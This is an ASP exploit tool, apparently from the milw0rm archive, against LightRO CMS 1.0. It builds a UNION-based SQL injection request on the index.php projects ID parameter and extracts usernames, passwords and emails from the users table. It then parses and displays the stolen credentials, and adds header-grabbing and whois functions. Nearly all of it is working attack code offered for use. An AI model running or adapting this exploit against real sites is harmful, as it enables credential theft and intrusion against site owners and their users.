<% = title %>

<% Response.Buffer = True %> <% On Error Resume Next %> <% Server.ScriptTimeout = 100 %> <% '=============================================================================================== '[Script Name: LightRO CMS 1.0 (index.php projectid) Remote SQL Injection Exploit '[Coded by : ajann '[Author : ajann '[Contact : :( '[S.Page : http://www.lightro.de.tc/ '[ExploitName: exploit2.asp '[Note : exploit file name =>exploit2.asp '[Update: + Get Header '[Update: + Get Whois Info '=============================================================================================== %> <% title="LightRO CMS 1.0 (index.php projectid) Remote SQL Injection Exploit" 'Vuln Title %> <% = title %> <% = title %>

TARGET:Example:[http://x.com/path]

USER ID:Example:[User ID=1]

<% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "There is a problem! Please complete to the whole spaces" End If If islem = "hata2" Then Response.Write "There is a problem! Please right character use" End If If islem = "hata3" Then Response.Write "There is a problem! Add ""http://""" End If If islem = "hata4" Then Response.Write "There is a problem! Just Numeric Character!" End If %> <% If islem = "get" Then id= Request.Form("id") file="index.php?section=projects&ID=" sql="-1'%20union%20select%200,1,6,7,8,9,2,3,4,5,10" sql1=",concat(char(85,115,101,114,110,9" sql2="7,109,101,58),name,char(32),char(80,97," sql3="115,115,119,111,114,100,58),password" sql4="),concat(char(101,109,97,105,108,58),email),1" sql5="3,14,1,5,3,4,29%20from%20users%20where%20ID=" sql6=id sql7="/*" idform = Request.Form("id") targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit2.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit2.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit2.asp?islem=hata3") Else IF Not IsNumeric(idform) Then Response.Redirect("exploit2.asp?islem=hata4") Else %> <% target1 = targettext+file+sql+sql1+sql2+sql3+sql4+sql5+sql6+sql7 Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "GET" , come, FALSE .sEnd take = .Responsetext End With SET objtake = Nothing End Function get_username = take(target1) getdata=InStr(get_username,"0 0/" ) username=Mid(get_username,getdata+5,90) Dim metin metin = take(target1) Dim objReg Set objReg = New RegExp objReg.Global = False objReg.IgnoreCase = True objReg.Pattern = "Username:[A-Za-z0-9ý]+ Pass" Dim calistir, istediginString Set calistir = objReg.Execute(metin) If calistir.Count = 0 Then Response.write "Not True" Else basusername = Replace(calistir.Item(0), "Username:" , "" ) basusername = Replace(basusername, " Pass" , "" ) objReg.Pattern = "Password:[A-Za-z0-9ý]+" Set calistir = objReg.Execute(metin) baspassword = Replace(calistir.Item(0), "Password:" , "" ) baspassword = Replace(baspassword, "" , "" ) objReg.Pattern = "email:[A-Za-z0-9@.]+" Set calistir = objReg.Execute(metin) basemail = Replace(calistir.Item(0), "email:" , "" ) basemail = Replace(basemail, "" , "" ) End If Set bulunanlar = Nothing Set objReg = Nothing %> ajann

Username:	<%=basusername%>
Password:	<%=baspassword%>
Email:	<%=basemail%>

<% hedef = targettext Dim objem Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP") objem.Open "GET" , hedef , false objem.sEnd strHTML = objem.ResponseText header=objem.getallResponseheaders() Response.Write "" Response.Write "" Response.Write "
Header Bilgileri
" Response.Write "" Response.Write "

" & header & "

" Response.Write "

Whois

" Response.Write "

Site:[google.com]

" Response.Write "" Set objem=Nothing %>
<% End If End If End If End If End If %> <% If islem = "whois" Then site = Request.Form("whoissite") target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain" Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "GET" , come, FALSE .sEnd take = .Responsetext End With Set objtake = Nothing End Function remoteadres=take(target1) dim baslangic , bitis baslangic = "

"
bitis = "

" dim x , abc x = 0 abc = 0 dim sonuc sonuc = "" Do Until abc = 2 x = x + 1 If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then abc = abc + 1 End If If Mid(remoteadres,x,Len(baslangic)) = baslangic Then abc = abc + 1 Else If abc = 1 Then sonuc = sonuc + Mid(remoteadres,x,1) End If End If Loop Set objtake=Nothing %> Whois Bilgileri

<% Response.Write "<" & sonuc %> </textarea> </p> </center> <center><form method="post" name="form2" action="exploit2.asp?islem=whois"> <p> <input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000"> <input type="submit" value="Yolla" name="B1"></p> </form></center> <% End If %> <% Response.Write "<br>" Response.Write "<center>" Response.Write "<pre class=""info"">" Response.Write "<font color=""#C0C0C0"" size=""1"">" Response.Write "En iyi " Response.Write "</font>" Response.Write "<font size=""1"" color=""#808080""><span class=""info2"">" Response.Write "1152x864 " Response.Write "</span></font>" Response.Write "<font color=""#C0C0C0"" size=""1"">çözünürlük ve " Response.Write "<span class=""info2""><font size=""1"" color=""#808080"">Firefox </font></span>" Response.Write "ile görüntülünebilir.</font></pre>" Response.Write "<pre class=""info"">" Response.Write "<font color=""#C0C0C0"" size=""1"">" Response.Write "Exploit coded by " Response.Write "</font>" Response.Write "<font size=""1"" color=""#808080""><span class=""info2"">" Response.Write "ajann" Response.Write "</span></font>" Response.Write "</center>" %> # milw0rm.com [2007-02-08]